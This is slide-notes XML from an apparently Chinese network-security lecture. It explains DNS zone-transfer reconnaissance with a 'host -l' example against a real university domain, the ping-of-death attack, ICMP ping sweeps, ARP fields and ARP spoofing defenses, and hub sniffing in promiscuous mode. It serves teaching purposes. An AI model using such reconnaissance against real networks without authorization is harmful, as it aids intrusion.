            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="CC0033"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，入侵者可获得保存在目标域服务器中的所有信息,其查询结果所含信息量的多少主要依靠于网络的大小和结构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Eg:host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>v sjtu.edu.cn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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mtClean="0"/>
              <a:t>ping of death </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击 是通过在最后分段中，改变其正确的偏移量和段长度的组合，使系统在接收到全部分段并重组报文时总的长度超过了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>65535</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>字节，导致内存溢出，这时主机就会出现内存分配错误而导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>堆栈崩溃，导致死机！</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2D9A1B-42FE-4F7D-936E-7CA488AF9546}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191490" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1914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24F4993-0808-4DF3-88B0-7212E0CEB14C}"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E3AA7C2-E326-4DAA-A01B-B47395D2D7FA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277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77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30CF54-1AC4-45F8-AA4A-F937BBEE526C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2816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81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1AA14D-004F-4643-B271-0D39379983F9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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EC8CE2-69D6-4A53-A600-C48A3C10A46E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30413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041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9EC955-FBD2-4C08-831A-270B93B92CC3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3061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06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r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP ECHO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>轮询多个主机称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP SWEEP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Ping Sweep).</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7D833BE-E595-4CEE-87AB-FCA85BAADD67}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3082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A0B1B1-5259-46B6-8B66-77E65BC3DA6D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3102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0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4F3F521-713E-4F4D-AB46-343AE434415A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3123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2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r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不仅仅能探测主机，也可以探测网络设备如路由</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3FC62F-2927-440A-9D77-E762A13D3064}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3143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1AA14D-004F-4643-B271-0D39379983F9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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74B732D-FA76-46B2-8006-381772F470E5}"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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191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81E729-1773-462A-8895-C577D3849152}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3164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64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58F261A-14ED-48A6-BA16-B9000D9D737B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3184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8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26A010F-F528-423B-8400-5C69CE0643FD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3205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20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487D93-DA27-4CFC-9628-3B825FD8F21D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32256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22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r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路径最大传输</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="CC0033"/>
                </a:solidFill>
              </a:rPr>
              <a:t>单元</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="CC0033"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PMTU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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166FCCE-F386-4698-93B3-57B751F361BB}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3819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819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4DD0D4E-0FD0-4317-A959-D76E90E6104C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3266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26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20EE039-7D77-47AE-95D6-C2379409ED7D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3840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84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A10702-88E7-49F4-974D-B8D6E3C8CF4C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3307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30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9741AB-5C76-4D5F-AC88-45FC19B6CC4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336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36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ECB339-4B6C-40EF-8423-20C7F4F79F4E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340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40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anose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204803" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>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1845F4-0208-40AC-BFC4-DD43E114B0EF}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3430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43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A377ED3-51E9-4E27-96CB-45846156C2EE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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49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F99A139-AD57-4735-B217-DFF4749BD811}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3952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95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626C6A-2839-402D-AC80-10DFD39C3857}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193538" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193539" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="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53141CF-DB3D-468A-BDF1-C0E57C47D2CC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194562" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1945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73A4DE7-CC8B-4A84-8FA7-B4C69C4C47FD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195586" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1955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9208FA4-4C84-4655-A207-CDD3BBC60008}"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1382D4D-30F6-4918-A0D6-1C55DB05113B}"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AF2A0351-5F87-4FB7-AAB7-DF11D031ED0A}"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B658BBA-0ADB-42A2-B983-07A4AE5FA72B}"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19811" name="Rectangle 3074"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119812" name="Rectangle 3075"/>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1859" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121860" name="Rectangle 1027"/>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0B29190-C91E-47F1-9AA3-47D9EA1423D9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134147"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41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交换机互联链路层各逻辑网段的特点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>分隔冲突域！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HUB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>共享冲突域和广播域，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>共享广播域，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>router</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>都不共享</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:br>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38124AB-7148-49F1-9BED-C2CA0B09DD2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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122884" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="100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smtClean="0"/>
              <a:t>硬件类型（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>），用于说明链路层协议类型。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>协议类型（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>PTYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>），用于说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>请求所对应的上层协议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>硬件地址长度（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HLEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>），以八位组（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Octet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>）为单位表示的硬件地址长度。如：以太网地址的长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>协议地址长度（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>PLEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>），以八位组为单位表示的上层协议的地址长度。如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>地址的长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>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FAEF439-EA21-406A-86E3-5C3A6BFD1778}"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1859" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121860" name="Rectangle 1027"/>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38124AB-7148-49F1-9BED-C2CA0B09DD2E}"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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122884" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="100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04914EC8-DFDC-4936-B5E6-CC3C199F8795}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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D31F822C-3D85-48D4-956A-9EF5B42D3863}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251"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mtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议原理－主机动态缓存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP/MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址映射。</a:t>
            </a:r>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DA246A4-337B-47D1-9FA8-BE6F9DDC863E}"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6611" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>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1074" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2147483647" y="166463663"/>
            <a:ext cx="0" cy="21470112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5"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解决方案：静态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>绑定</a:t>
            </a:r>
            <a:endParaRPr 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E344B05-005A-473C-AEDD-36894F33EA35}"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22" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2147483647" y="0"/>
            <a:ext cx="222316675" cy="1667383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23"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zh-CN" smtClean="0"/>
              <a:t>以太网采用星型拓扑结构，使用集线器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>hub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>）或者交换机（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>）连接网络节点。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>集线器是一种物理层设备，当表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>的信号到达一个接口时，集线器重新生成该信号，并广播给所有接口。集线器连接的以太网，所有节点都能够</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>听到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>其它节点之间的数据交换，因此任何节点都可以通过把网卡设置为混杂模式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Promiscuous Mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>）进行窃听，没有任何的机密性可言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>交换机以帧的概念进行工作，根据交换机表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>switch table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>）来决定把到达的帧发送到哪个端口，而不是广播接收到的帧。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
